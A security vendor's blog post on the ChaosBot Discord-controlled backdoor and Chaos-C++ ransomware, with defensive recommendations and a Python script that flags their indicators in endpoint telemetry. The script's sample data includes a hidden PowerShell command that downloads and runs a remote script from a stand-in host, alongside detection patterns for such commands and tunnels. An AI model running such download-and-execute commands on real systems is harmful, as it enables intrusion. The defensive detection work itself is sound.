A new piece of malware is alarming security researchers: ChaosBot, a backdoor written in Rust that uses Discord as its command‑and‑control (C2) channel. Alongside it, a more dangerous evolution of the Chaos ransomware has emerged, now adding file destruction and clipboard hijacking.
According to reports from eSentire and Fortinet, these threats reveal a growing ecosystem that blends credential theft, social engineering, reverse tunneling, and advanced evasion techniques.
At TecnetOne, we explain how this attack works, why it’s especially dangerous, and how you can defend your organization.
What Is ChaosBot and How It Spreads
ChaosBot is a Rust‑based backdoor first detected in September 2025 within a financial services firm.
It allows attackers to execute remote commands, steal files, and maintain persistent access to compromised systems.
Initial access typically comes through stolen or misconfigured credentials. In one observed case, the attackers used an overprivileged Active Directory account and compromised VPN credentials, then deployed the malware to hosts over WMI (Windows Management Instrumentation), which lets an authenticated account run commands on remote machines.
Other variants spread through phishing emails carrying malicious .LNK shortcuts. Opening the shortcut launches a PowerShell command that downloads the payload from an external server while displaying a decoy PDF, such as a fake “State Bank of Vietnam” notice, so the user sees nothing unusual.
How ChaosBot Operates
ChaosBot is technically capable and hides behind legitimate Windows software.
Key capabilities include:
- DLL sideloading: The main payload, msedge_elf.dll, is loaded by a legitimate, signed Microsoft Edge binary (identity_helper.exe) placed next to it, so the malicious code runs inside a process that carries a trusted name and signature.
- Discord‑based C2: Operators use attacker‑controlled Discord accounts and create channels named for each victim, through which they issue commands, exfiltrate data, and manage files. To a network monitor the traffic is just HTTPS to Discord.
- Reverse proxy tunneling: Downloads FRP (Fast Reverse Proxy) to keep an inbound path to the host that does not depend on the Discord channel, and in some intrusions abuses Visual Studio Code’s Remote Tunnel feature as an alternative backdoor.
- Core functions: Executes PowerShell commands, captures screenshots, uploads and downloads files, and communicates with the C2 in real time.
- Evasion: Patches ntdll!EtwEventWrite in memory so that Event Tracing for Windows (ETW) events from the process are suppressed, and checks for VMware or VirtualBox artifacts to avoid running under sandbox analysis.
In essence, ChaosBot is a remote‑access espionage tool disguised as legitimate software, giving its operators a foothold for lateral movement and quiet data exfiltration.
Chaos‑C++ Ransomware: The Second Phase
While ChaosBot serves as the reconnaissance and access tool, the Chaos‑C++ ransomware delivers the destructive blow.
According to Fortinet FortiGuard Labs, this upgraded variant merges encryption, file deletion, and clipboard hijacking to maximize damage.
Most destructive features:
- Permanent file deletion: Files larger than 1.3 GB are deleted outright instead of encrypted, so no ransom payment can bring them back; only a backup can.
- Clipboard hijacking: Monitors the clipboard and replaces cryptocurrency addresses with the attacker’s wallet.
- Adaptive execution: If %APPDATA%\READ_IT.txt (the ransom note) already exists, it assumes the host has already been processed and runs only in a monitoring mode (the clipboard hijacking above); otherwise, it disables recovery options and encrypts files under 50 MB.
- Hybrid encryption with an XOR fallback: Combines symmetric and asymmetric encryption, and where that routine fails it still XORs the file contents, so the file is corrupted either way.
This evolution shows that Chaos‑C++ aims not only to extort but to cause irreversible loss, amplifying pressure on victims.
How Victims Are Targeted
ChaosBot and Chaos‑C++ primarily target corporate networks with exposed services—VPNs, RDP, or admin accounts—and organizations lacking network segmentation.
Their use of Discord for C2 makes detection difficult since the traffic runs through a legitimate platform.
Techniques like DLL sideloading and malicious LNK phishing remain highly effective, especially against untrained users.
Attack Chain diagram (Source: esentire.com)
The Risks for Businesses
These campaigns can devastate victims within hours, leading to:
- Total data loss where backups are missing, or are reachable and deletable by the attacker
- Extended operational downtime
- Theft of sensitive data—credentials, financials, IP
- Severe reputational and legal consequences
The combination of espionage (ChaosBot) and destruction (Chaos‑C++) forms a hybrid attack that merges ransomware, trojans, and advanced persistence.
How to Defend Against the Chaos Ecosystem
At TecnetOne, we recommend a defense‑in‑depth approach combining access control, technical safeguards, and employee awareness.
Credentials and Access
- Rotate VPN and service‑account credentials, starting with any account that may have been exposed, and strip excess privileges from Active Directory accounts.
- Enforce multi‑factor authentication (MFA) on all remote logins.
- Apply least‑privilege and JIT/JEA (Just‑In‑Time / Just‑Enough‑Admin) principles, so that one stolen account cannot push software to every host over WMI.
Endpoints and Monitoring
- Flag identity_helper.exe, or any signed Edge binary, running from outside the Edge installation directory, and any process loading a msedge_elf.dll that is unsigned or not in that directory.
- Track PowerShell launched from shortcuts (explorer.exe as the parent process) or from temp and download folders, especially with hidden‑window or download arguments.
- Detect in‑memory patching of ntdll!EtwEventWrite: the function’s first bytes in a running process should match the on‑disk ntdll.dll.
- Monitor outbound connections to Discord from processes other than browsers or the Discord client, and connections characteristic of FRP or VS Code tunnels.
Network Controls
- Block or inspect Discord connections in corporate environments.
- Restrict reverse‑proxy tools and inspect TLS traffic for anomalies.
- Enforce strict egress filtering to prevent data exfiltration.
Email Security and Awareness
- Block .LNK attachments at the mail gateway, including those inside archives, and quarantine or sandbox them rather than delivering them.
- Train staff to recognize phishing and fake PDFs.
Backups
- Maintain immutable, offline (air‑gapped) backups.
- Test restoration regularly.
- Limit backup‑system permissions to prevent deletion.
Early Detection and Response
Early detection is crucial. Look for:
- Discord API traffic from processes that are not browsers or the Discord client
- msedge_elf.dll or identity_helper.exe present outside the Microsoft Edge installation directory (both names belong to legitimate Edge files; it is their location and signature that matter)
- New persistent services or tunnels (FRP, VS Code Tunnel)
- Creation of %APPDATA%\READ_IT.txt
If any indicators appear, isolate affected devices, perform forensic analysis, and review remote‑access and remote‑execution logs (WMI, RDP, VPN).
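The indicators just listed, together with the endpoint monitoring items earlier on this page, can be turned into a small triage pass over endpoint telemetry. The following is an added example, not detection content from eSentire, Fortinet or any vendor. Field names follow Sysmon event IDs 1 (ProcessCreate), 3 (NetworkConnect), 7 (ImageLoad) and 11 (FileCreate); the Edge install path, the hostname suffixes, the browser allowlist and the PowerShell argument tokens are this example’s assumptions, and every event record is constructed rather than captured.

```python
"""Rule-based triage of Sysmon-style endpoint events for the ChaosBot / Chaos-C++
indicators described in the article. Added example; all events are constructed.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumptions for this example, not published IOCs: tune to your estate.
EDGE_DIR = r"C:\Program Files (x86)\Microsoft\Edge\Application"
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "brave.exe", "discord.exe"}
C2_DOMAINS = ("discord.com", "discordapp.com", "discord.gg",
              "tunnels.api.visualstudio.com")  # Discord C2 and VS Code Remote Tunnel
TUNNEL_BINARIES = {"frpc.exe", "frps.exe"}
PS_BINARIES = {"powershell.exe", "pwsh.exe"}
PS_TOKENS = ("-enc", "-e ", "downloadstring", "invoke-webrequest", "iwr ",
             "iex", "-w hidden", "-windowstyle hidden", "bypass")


@dataclass
class Alert:
    rule: str
    detail: str


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _under(path: str, root: str) -> bool:
    return path.lower().startswith(root.lower() + "\\")


def _matches_domain(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def check_event(ev: dict) -> list:
    """Return the alerts a single event triggers (usually none)."""
    alerts, image = [], _name(ev.get("Image", ""))
    if ev["EventID"] == 7:  # ImageLoad: sideloading check for the Edge helper binary
        if image == "identity_helper.exe" and _name(ev.get("ImageLoaded", "")) == "msedge_elf.dll":
            in_place = _under(ev["Image"], EDGE_DIR) and _under(ev["ImageLoaded"], EDGE_DIR)
            signed_ms = ev.get("Signed") == "true" and "Microsoft" in ev.get("Signature", "")
            if not (in_place and signed_ms):
                alerts.append(Alert("dll_sideload", f"{ev['Image']} loaded {ev['ImageLoaded']}"))
    elif ev["EventID"] == 1:  # ProcessCreate
        cmd = ev.get("CommandLine", "").lower()
        # A double-clicked .LNK appears as explorer.exe spawning PowerShell with hidden/download flags.
        if (image in PS_BINARIES and _name(ev.get("ParentImage", "")) == "explorer.exe"
                and any(t in cmd for t in PS_TOKENS)):
            alerts.append(Alert("lnk_powershell", ev["CommandLine"]))
        if image in TUNNEL_BINARIES or (image == "code.exe" and " tunnel" in cmd):
            alerts.append(Alert("reverse_tunnel", ev["CommandLine"]))
    elif ev["EventID"] == 3:  # NetworkConnect: Discord/tunnel egress from a non-browser
        host = ev.get("DestinationHostname", "")
        if _matches_domain(host) and image not in BROWSERS:
            alerts.append(Alert("c2_egress", f"{ev['Image']} -> {host}"))
    elif ev["EventID"] == 11:  # FileCreate: Chaos-C++ ransom-note marker
        if _name(ev.get("TargetFilename", "")) == "read_it.txt":
            alerts.append(Alert("chaos_marker", ev["TargetFilename"]))
    return alerts


def analyze(events: list) -> list:
    return [a for ev in events for a in check_event(ev)]


# Constructed sample events; 192.0.2.10 is from the RFC 5737 documentation range.
EDGE_VER = EDGE_DIR + r"\130.0.2849.56"
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\Public\Edge\identity_helper.exe",
     "ImageLoaded": r"C:\Users\Public\Edge\msedge_elf.dll", "Signed": "false", "Signature": ""},
    {"EventID": 7, "Image": EDGE_VER + r"\identity_helper.exe",
     "ImageLoaded": EDGE_VER + r"\msedge_elf.dll", "Signed": "true", "Signature": "Microsoft Corporation"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/a.ps1\')"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"EventID": 3, "Image": r"C:\Users\Public\Edge\identity_helper.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    {"EventID": 3, "Image": EDGE_DIR + r"\msedge.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Users\Public\frpc.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "frpc.exe -c frpc.toml"},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\READ_IT.txt"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

Of the eight constructed events, five alert and three (the genuine Edge load, a plain interactive PowerShell, and the browser reaching Discord) stay quiet, which is the point of keying on location and signature rather than on file names alone. Keep the allowlists honest: a sanctioned client missing from BROWSERS produces false positives, and the sideload rule should be generalized to any signed binary found outside its installation directory, not only identity_helper.exe.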
Conclusion
ChaosBot and Chaos‑C++ represent a new generation of modular malware—intelligent, destructive, and engineered to evade detection.
Their abuse of legitimate channels like Discord and their advanced persistence mechanisms make them formidable threats.
The best defense is anticipation: reinforce identity controls, monitor networks in real time, and educate your teams on early detection.
At TecnetOne, we help organizations prevent, detect, and respond to complex threats like ChaosBot through adaptive, intelligence‑driven cybersecurity.
Because today, cybersecurity isn’t just about protecting systems—it’s about protecting business continuity.